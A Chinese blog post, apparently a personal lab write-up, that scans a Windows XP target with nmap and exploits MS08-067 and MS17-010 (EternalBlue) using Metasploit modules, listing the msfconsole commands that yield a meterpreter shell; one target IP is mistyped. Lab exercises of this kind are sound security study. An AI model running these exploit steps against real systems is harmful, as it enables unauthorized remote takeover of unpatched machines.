使用metasploit漏洞测试

没网闲着无聊,灵魂无处安放呀,就简单的用metasploit玩玩。

实验环境:

目标主机:Windows XP professional

攻击机: kali linux

1.漏洞扫描 

nmap --script=vuln 172.20.10.5

扫描结果提示,易受攻击的有:

1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服务器中的远程代码执行漏洞(MS17-010)

以上述两个为例学习使用metasploit漏洞利用模块进行攻击:

2.漏洞利用

实例一:使用MS08-067模块进行攻击测试

命令:
启动Metasploit:msfconsole
        msf5 >:search ms08_067 /*查找可用的攻击模块*/
        msf5 >:use exploit/windows/smb/ms08_067_netapi  //使用模块
 

输入info 可用目标主机,本次环境目标为34 ,设置目标环境set target 34

显示payload 需要设置的项,如下图需要设置目标主机,设置好后执行攻击

msf5 >:set target 34   //设置目标主机的系统版本,防止语言导致攻击失败
msf5 >:show payload    //显示需要设置的项
msf5 >:set rhost  127.20.10.5 //设置目标主机Ip 
msf5 >:exploit      //执行攻击

成功后meterpreter输入shell即可远程执行相关任务,查看用户名等操作。

实例二:利用MS17-010进行攻击测试,同里查看可用的攻击模块

同样的我们这次选用eternalblue smb远程windows内核池破坏

设置好相关参数后开始执行攻击,由于目标主机重启后未激活,导致利用漏洞攻击成功,但未能建立会话,目标主机正常启动就能成功建立会话。

系统未激活导致无法进入,建立连接。

 

总体来说在漏洞测试方面,metasploit是非常强,简单高效的操作提高工作效率

 

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值